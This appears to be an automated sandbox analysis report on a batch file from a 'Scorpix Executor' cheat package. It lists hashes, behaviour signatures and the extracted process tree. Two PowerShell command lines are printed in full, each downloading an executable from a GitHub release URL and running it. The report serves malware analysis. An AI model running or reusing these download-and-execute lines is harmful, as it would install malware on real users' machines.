Analysis
-
max time kernel
1528s -
max time network
1501s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
26/07/2024, 13:16
Static task
static1
Behavioral task
behavioral1
Sample
Scorpix-ExecutorV3 (1).zip
Resource
win11-20240709-en
Behavioral task
behavioral2
Sample
Executor/README.txt
Resource
win11-20240709-en
Behavioral task
behavioral3
Sample
Executor/Scorpix AI/Scorpix AI/AI.py
Resource
win11-20240709-en
Behavioral task
behavioral4
Sample
Executor/Scripts/INFO.txt
Resource
win11-20240709-en
Behavioral task
behavioral5
Sample
Executor/Start Executor.bat
Resource
win11-20240709-en
General
-
Target
Executor/Start Executor.bat
-
Size
551B
-
MD5
fe821790779e191b514f7d90b381d191
-
SHA1
03be2cfc52ec390a30209c33f7ea3a42589a0785
-
SHA256
6afbbef338a695004853bb806f146efdd2d216a1fa58cb34fd10509495b4415b
-
SHA512
425cdb0bd257a71a952293c77984635484dd30a6fc8c9f287100a99016ffc51a884442595eb6eed102fcbceebb6b01f609ba45f5fb2535a3156a8eef04ab50aa
Malware Config
Extracted
https://github.com/vlyian/scorpix/releases/download/vypix/Scorpix-ExecutorV3.exe
Extracted
https://github.com/vlyian/scorpixe/releases/download/vypix/ScorpixDLL.exe
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 4944 powershell.exe 4 2680 powershell.exe -
pid Process 4944 powershell.exe 2680 powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4944 powershell.exe 4944 powershell.exe 2680 powershell.exe 2680 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4944 powershell.exe Token: SeDebugPrivilege 2680 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 5028 wrote to memory of 4944 5028 cmd.exe 79 PID 5028 wrote to memory of 4944 5028 cmd.exe 79 PID 5028 wrote to memory of 2680 5028 cmd.exe 80 PID 5028 wrote to memory of 2680 5028 cmd.exe 80
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Start Executor.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $down=New-Object System.Net.WebClient;$url='https://github.com/vlyian/scorpix/releases/download/vypix/Scorpix-ExecutorV3.exe';$file='Scorpix-ExecutorV3.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $down=New-Object System.Net.WebClient;$url='https://github.com/vlyian/scorpixe/releases/download/vypix/ScorpixDLL.exe';$file='ScorpixDLL.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
Filesize
1KB
MD56f974f924033aa21493202e5edfcea2b
SHA18f19b88bfc19a6e9bdb2fa4952eda84384a6e62c
SHA256353db94912ced8058a337a579c2431da31b1934cbb3578e2c63f13eac0d2deaa
SHA512c3268aca736939c61901ecadfea9c67385ce47a20b4f7f1bd598b0b48761492920cdba5a732b4a77e0887c575fd28de6a8febecc193abb9cb59fe94424dc0cc8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82